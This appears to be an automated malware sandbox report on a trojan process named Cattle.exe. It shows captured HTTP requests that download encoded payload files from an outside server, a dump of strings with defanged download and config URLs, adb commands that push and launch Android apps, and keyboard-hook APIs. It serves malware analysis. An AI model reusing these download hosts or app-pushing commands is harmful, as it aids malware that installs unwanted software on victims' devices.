fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROpmsCvGM4F5O 0H8fI6LU0SnT9JQBtwTKo isNVtIVfyikHs314aQEo8WnGgaYNOYti7JbybwbjXtDLUztYgLDGYIyvVpneJpjxacaBpg05hHqQn0vWUMNAxHJLkgqqbtXsWSFpCFXznYaWnJyiqVTQYisCkYbszfjxacaBpg05i2LslvJvBuNf5/ 1gVd/aPFaicSzkOlLdWu16IMN5EZPSbAmHPWu2VwxKdPaxzM4ARzYrMdK4Wgapq7QaHDbBH9YOLT4VPwHfkN9pOcSW92/ H/y8AHjmYlX5LzBPSWrCqau0Ghw2wR7kX31v3lmcY/EeR7wuX05CO1w7MsCkWC/YpWIYAC31vP0zvj66M6MasC9rb4ePfGm1fp/9EdCb4jnBaoIWSy03YRRfh6CNlJDNv8 xdd0TLy7oI1BJLIN0CKwrGLQpTsLJtPHh85eLwE67KQoPir eXUwtsLHqK/MMRdAUG3dt3mKZVGBprisj6ATJ0Pz1T0J1YUMOTo3T5veee2A6MjQcNJgZyTHURsPxuw/bfnjUXiHx7L/Gsjldgifr6FBvzIp7Oll4I4yBYQLLDOhQE03YcR1OIgCF2eyAUtqVkwDf4/YP3OWe5YCxb0/YljczczPctBAhbjUDsvMrryXPKjJxJ3I33F/4UdU1N3e0DlO1FiXfjISZZCN/26i/6qcqiLFbQ6HCc4z7Iol75n6dLEkiVAWvLmEXezW23xsVS5EQhw5qOejY4ZYfmAV i0kvP0B68M9BcjQNaY0cbtKVkPGYW8c8XA0DXy1vj65gYfuA4cdxlJblUtd1g6QEX4DmoAWWbV7isPPspjY7MPehWqjDK0uJdU8znJKqgWb0Bo ydstzUbnzYc8fqIB2qZ3Wvg7T m2uQMJX1Wp/A0QXR9fvb6am/3VfiqQNIq BjFmOf3Q1Z 7vLpgNgFmUb8hblEqwCYKxJdChUOYzpOrPssFok3SoqjajGVW8icwZ4oqcgwoVWldF61vikzxRKZTYg vnyku5NNfvVoh/VyXuYcZDDE3aiauCeIvQof5wCjDRqb8TnP4LYC /waDknwVWNsbtz2QQdajxUpR5AlhMsgfCOWEBw5Xn/OB9RWfAB4dDmsvYR0z2VvfKH3pLD685Vdc4Orc9IR7Q5D6MqT5ItJJ0qtpHmG1gs3lYwkSwCX15xZ2xRW2vOixgQjGOi2IHE8d0VuddZvqrbbaPHyRN35DnmvT6xagZIbDBWNAHqNUKZcBcVr5/MDM3UVz2SuRPhEwtjkQRnvQ4nBh4eP7sHKkDpGa4mHrr8/xvj9jPDHw/Mjl6RXtxu2cXzLjCLiPbgmKpv9nXFhvvB/zZqMDsH27jObAFz6WviISiEmy2BrFKcCAv8GKvty 7XkKg/YWMNT/nyku5NNfvVZHKSiDqAZaxRoqcW57iew5/5lNjMkm6/uAMcPA58c9DJg4zDj5Sv5ClmIuib87U6khvN9v49V/2PxjmnEn6uEEtkN1NP9JWy
<<< skipped >>>
GET /txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 684044
Last-Modified: Wed, 24 Jun 2015 10:44:45 GMT
Connection: close
ETag: "558a8a1d-a700c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvAblegbVkE3QksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL8sFrZ6ScHQdh2Uj5tr5A5VTJW5rSxUYwBJJMoO9Bc7sUyLDFIXqMZC3CgFBCbdFr0sWYbC8Wp6yQl26h5WnPxqBJNc UpnuDjERuftzRF72x3xK DN ZbpznHoTXLxPSRe5YgD72LMOyEo87S0SemMaVw3Z/FrdteueXiWsJQ9C979Xf4K83Kpmj7WLBdPjjE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxKvNkFlBxUMrfdg0 sDpLF9wjBVspUOVn3e28nV1s3Q7uOGK1sSqvG9kjmdVnettaSXJyfQNpBOtSscWDuPDWx/KxxYO48NbH8rmvTShj4cTdlVvCrfQXkn6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI Ws2WyVSGWEulsKFk4YKyzx6xNrNDZlI WvE2s0NmUj5a5sWWGLR964b7hS7RjImYJXE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrMjKhtrhBipDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr/hZOVmqZR7/0iNwSnoKul3E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVy63fWnEfdS 3vHuuOQ4TExNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW9dWmDiOWWmddr2GhIVxawMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBI02AJZ6GJA0W7tytP5KGfE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWmfMTRPQazMr mYkEn66z9xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a95/gHbcC4GpNQ3 Tprub/0qNmMz6EuD7Cg5inGUJPrRG1ClRSFTzMFAEeqUxqf27BGiNZi64DKJkdCYX9TpG9uMD4Lptj4WXAs bfBiT1frx9VPKf8j9WkIkNe1I5ALdTC853zptdWa5CuLWMJel0Z2iy/UtuZhx3gHo4aZnsQ
<<< skipped >>>
GET /txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimnTp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJAaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfezaJwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
GET /txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:33 GMT
Content-Type: text/plain
Content-Length: 981316
Last-Modified: Fri, 06 Nov 2015 14:21:22 GMT
Connection: close
ETag: "563cb762-ef944"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCpCw//ZtlXeqL0Oq8hXmhS1dbIATI0j4H7hDmNhxfqBCuL8cMOpsqNVzNxLIKG5qZSBSuCn5fx0f5/ 1gVd/aPP9SOom WIpKohgOc l04FPz0GxiLEfhYTCxM4/qK98WfgaoYEWng/qVMRYJchKrjV27X9yjCsrj/nl7eyOl1GODLoPv9LNgJfCygIPvfQmf9Yasux9OxPN4R8Qn8NqxFalNvYESg2EtfHr7qnITxIETLkPSHK/J7NMbXnIvNHRyM4KOTUbl1IC4k7gkoWb2hooyOsK5E3V 3nLwnD/jdjjV9VvGoips7HiZZ7YpDZ0vb6ilBLhvc7kX6 lesXzT6wd3jt6gSOucIAP3AppOCQFLnZiT96Kv ERmY8pUqO75F3fxKwsZxZX08DnNfkCje6 IpytI1JqNdmE0ulS19g2FokFVFNhu9B MRI0rv1TZZqup5rKw7rq9cL2R7QL6w ffUtPl9E53YRfnIoPPhpwmxXZ68c6AzqLD/xO2/dVGEIC671vaGohXFr S644o0iHKKw1Naj7KPLwTvcIsrO2 3QjGij9Vgih1ZzWMaq7OnX4EM2fUJjB/3b/jVCIu263OFJR9eWl1wZehrcaQnMZEEjgeZvuc1YJE9t2ctzG332utSBEuw04QgLrvW9oaiGQ2s4RSCXYkeTMIGFnVTEBg036c88SGDCftSG8n5DjNv4Uen03mn8I8vBO9wiys7Jc4v/zYZvkpBKinkhtiwZadfgQzZ9QmMrFe huETw2Vr0RuTs Y6Bbbs7cMiCJ4EoQ/DLIvFbwzR02aH9CcpjNB3YSiQv9k83nwMCytatubl57h/kw7k tEZ0CLLBenWWV3745fWYk2s7t8bZ/NJsvnyku5NNfvVhIV/YOVE9gxgkT23Zy3MbQ7iYzErPcsmJ6HScuGiYesj0B4xlHjNxqq6DTrmKtEQlEb7gGIas6RGauP1vWaua48/9zYD9ICXJ4ENgI/IsXv58pLuTTX71aY9BHiIyyaJYJE9t2ctzG0ADeVWoFMJw3aGCG39/O Dmin1S89u Ag/xciG6s92SqqLnTP0Y6h0taGu Eiv44BPcQ1vqgkBt6nb/eyVqJW7T2xoy2CTrJhj30bEi6UmXENleioU6zhjNrVu1/rdLIHidULQgw4/OY8vBO9wiys7ea/ixrWbXHS7ZuZVM5xCTw jKk SLSSdw062PGxKZU2PaahO6Lc7qM2u9iEC5DZKSRMLkfCDzYge3s7/Ba78SUZq4/W9Zq5r5D9yfW ufdob7sixSPg5M0Zq4/W9Zq5rUX5yXwB 1/9gkT23Zy3MbfS0dnBMwsSQJ6HScuGiYes2z53ycDjwMPfWjfpAjdmZnJCGKbiAAVZIZpQP5BcrAsKg9VYCq5CbZir9ebxZqgVYLhY7ig9a6lvcrHt96Z1JpY9ReulnBfleVTvCunHEXPnyku5NNfvVcfP7aaDPJ00l6fTdDKJcBM0eReDfMeDa
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Cattle.exe_3444:
`.rsrc
`.rsrc
t.hP4S
t.hP4S
t.hd:S
t.hd:S
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
u$SShe
u$SShe
@ SSHPWj
@ SSHPWj
j%XtL9E
j%XtL9E
tAHt.HHt
tAHt.HHt
t'SShl
t'SShl
SSSSh`
SSSSh`
FTCP
FTCP
FtPW
FtPW
SSh@B
SSh@B
CNotSupportedException
CNotSupportedException
CHttpFile
CHttpFile
hXXp://
hXXp://
kernel32.dll
kernel32.dll
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
RegOpenKeyTransactedA
Advapi32.dll
Advapi32.dll
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
ole32.dll
RegDeleteKeyExA
RegDeleteKeyExA
user32.dll
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
Shell32.dll
Shell32.dll
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
&%d %s
Hex={X,X,X}
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
KeyboardManager
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sDockingManager-%d
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
%c%d%c%s
%c%d%c%s
RGB(%d, %d, %d)
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
windows
windows
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
code %d bits %d->%d
code %d bits %d->%d
gen_codes: max_code %d
gen_codes: max_code %d
bl code -
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
-1.1.3
1.1.3
1.1.3
%s%s%s
%s%s%s
Correct password required
Correct password required
1.2.8
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
entryCount=%d
x-xx-xxxx-xxxx
x-xx-xxxx-xxxx
XXXXXXXXXXX
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(lo-client:%s%d)
%d(%s)
%d(%s)
%s%s/
%s%s/
cannot open '%s': %s
cannot open '%s': %s
cannot stat '%s': %s
cannot stat '%s': %s
skipping special file '%s'
skipping special file '%s'
cannot read '%s': %s
cannot read '%s': %s
error seeking in file '%s'
error seeking in file '%s'
could not allocate buffer for '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
file '%s' is not a valid zip file
AndroidManifest.xml
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
%d file%s pushed. %d file%s skipped.
error: %s
error: %s
%s/%s
%s/%s
hXXp://app.miaoxia8.com/driver/
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
c:\windows\temp
%s\%s
%s\%s
DPInst.exe
DPInst.exe
\DPInst.exe
\DPInst.exe
xm32.zip
xm32.zip
xm64.zip
xm64.zip
ua32.zip
ua32.zip
ua64.zip
ua64.zip
:%d: %s
:%d: %s
0xX,
0xX,
can't find '%s' to install
can't find '%s' to install
can't install '%s' because it's not a file
can't install '%s' because it's not a file
shell:am start -n %s
shell:am start -n %s
shell:input keyevent 3
shell:input keyevent 3
/data/local/tmp/%s
/data/local/tmp/%s
/sdcard/tmp/%s
/sdcard/tmp/%s
--key
--key
host-serial:%s:%s
host-serial:%s:%s
%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
VID:%s
Zip EOCD: expected >= %d bytes, found %d
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d) comment(%d) exceeds len (%d)
EOCD(%d) comment(%d) exceeds len (%d)
Archive spanning not supported
Archive spanning not supported
protocol fault (status x x x x?!)
protocol fault (status x x x x?!)
host:transport:%s
host:transport:%s
transport-usb
transport-usb
transport-local
transport-local
transport-any
transport-any
host:%s
host:%s
TscServer.exe
TscServer.exe
Windows
Windows
PID:%s
PID:%s
127.0.0.1
127.0.0.1
taskkill /f /im %s
taskkill /f /im %s
%s\adb.ini
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
?MAC=%s&PID=%s
adb.ini
adb.ini
APPURL
APPURL
/TscServer.exe
/TscServer.exe
ShellRun%s/%s
ShellRun%s/%s
iphlpapi.dll
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
InternalGetTcpTable2
transport
transport
XXXXXX
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
c:\app\Call.pdb
.PAVCFileException@@
.PAVCFileException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
c:\windows\temp\Cattle.exe
c:\windows\temp\Cattle.exe
06/02/2011
06/02/2011
000000000000
000000000000
Keyboard
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
1000_1234
PeekNamedPipe
PeekNamedPipe
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
Reporte_Dispatch
Reporte_Dispatch
RegQueryInfoKeyA
RegQueryInfoKeyA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
GetViewportOrgEx
GetViewportOrgEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GetViewportExtEx
GdiplusShutdown
GdiplusShutdown
ShellExecuteA
ShellExecuteA
UrlUnescapeA
UrlUnescapeA
URLDownloadToFileA
URLDownloadToFileA
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyA
MapVirtualKeyA
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetKeyNameTextA
GetKeyNameTextA
UnhookWindowsHookEx
UnhookWindowsHookEx
MapVirtualKeyExA
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
HttpQueryInfoA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
2;%SK
2;%SK
`#T##.#.WA3#-3&
`#T##.#.WA3#-3&
.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
$###$-1?
$###$-1?
2 (;%(10
2 (;%(10
$,0(,$($,000 ,$ $
$,0(,$($,000 ,$ $
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
.iLiw-Z
.iLiw-Z
41;.Hx
41;.Hx
,"G.Ar#_
,"G.Ar#_
.zCN,-6[(
.zCN,-6[(
`.rdml>
`.rdml>
KERNEL32.DLL
KERNEL32.DLL
adbWinpi.dll
adbWinpi.dll
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
COMDLG32.dll
COMDLG32.dll
GDI32.dll
GDI32.dll
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MSIMG32.dll
MSIMG32.dll
OLEACC.dll
OLEACC.dll
OLEAUT32.dll
OLEAUT32.dll
SETUPAPI.dll
SETUPAPI.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
urlmon.dll
urlmon.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
